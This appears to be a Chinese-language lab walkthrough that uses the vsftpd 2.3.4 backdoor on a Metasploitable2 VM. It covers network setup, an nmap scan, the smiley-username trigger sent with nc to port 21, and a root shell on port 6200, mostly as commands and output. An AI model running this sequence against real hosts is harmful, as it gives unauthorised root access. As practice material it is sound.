system:kali
ipaddr:192.168.10.222
netmask:255.255.255.0
gateway:192.168.10.254

system:metasploitable2
ipaddr:192.168.10.20
netmask:255.255.255.0
gateway:192.168.10.254

metasploitable2

用户名和密码:msfadmin

登陆root并更改密码

sudo su 
#输入当前用户的密码:msfadmin
passwd root
#输入要修改的密码:toor

修改网卡配置文件

vim /etc/network/interfaces
---------------------------------
auto eth0
iface eth0 inet static
address 192.168.10.20 
netmask 255.255.255.0
gateway 192.168.10.254
---------------------------------

重启网卡并查看

/etc/init.d/networking restart
ip add

kali

用户名和密码:kali

使用nmap工具扫描192.168.10.20主机

nmap 192.168.10.20

---------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-08 21:12 EST
Nmap scan report for 192.168.10.20                  #192.168.10.20的扫描报告
Host is up (0.0019s latency).                       #主机已开启
Not shown: 977 closed tcp ports (reset)             #未显示:977 个关闭的 TCP 端口(重置)
PORT     STATE SERVICE                              #端口  状态  服务
21/tcp   open  ftp                                  #这个是我们需要攻击的vsftp 2.3.4服务
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:02:5C:4B (VMware)             #MAC地址:00:0C:29:02:5C:4B(VMware)

Nmap scan report for 192.168.10.222                 #这些是kali自己的,都已忽略
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.10.222 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (2 hosts up) scanned in 6.79 seconds
--------------------

再打开一个终端,使用nc(瑞士军刀)连接21端口

nc 192.168.10.20 21

-------------------
220 (vsFTPd 2.3.4)                   #连接至服务器
user a:)                             #提供用户名(输入)
331 Please specify the password.     #表示它已经接受了用户名,并要求指定密码
pass 123456                          #提供密码(输入)
-------------------

切回刚刚扫描的终端,使用nmap工具扫描192.168.10.20主机的6200端口

nmap -p 6200 192.168.10.20

-------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-08 21:21 EST
Nmap scan report for 192.168.10.20                  #192.168.10.20的扫描报告
Host is up (0.00026s latency).                      #主机已开启

PORT     STATE SERVICE                              #端口  状态  服务
6200/tcp open  lm-x                                 #这个是我们刚刚nc瑞士小军刀划开的端口
MAC Address: 00:0C:29:02:5C:4B (VMware)             #MAC地址:00:0C:29:02:5C:4B(VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.35 seconds
-------------------

#使用nc(瑞士军刀)连接6200端口

nc 192.168.10.20 6200

-------------------
whoami                    #询问当前用户是谁(输入)
root                      #反馈的当前用户
-------------------

如果连不上,看看之前 nc 192.168.10.20 21 这个命令的终端

如果最后一行出现 421 Timeout. 表示连接已超时

重新打一遍 nc 192.168.10.20 21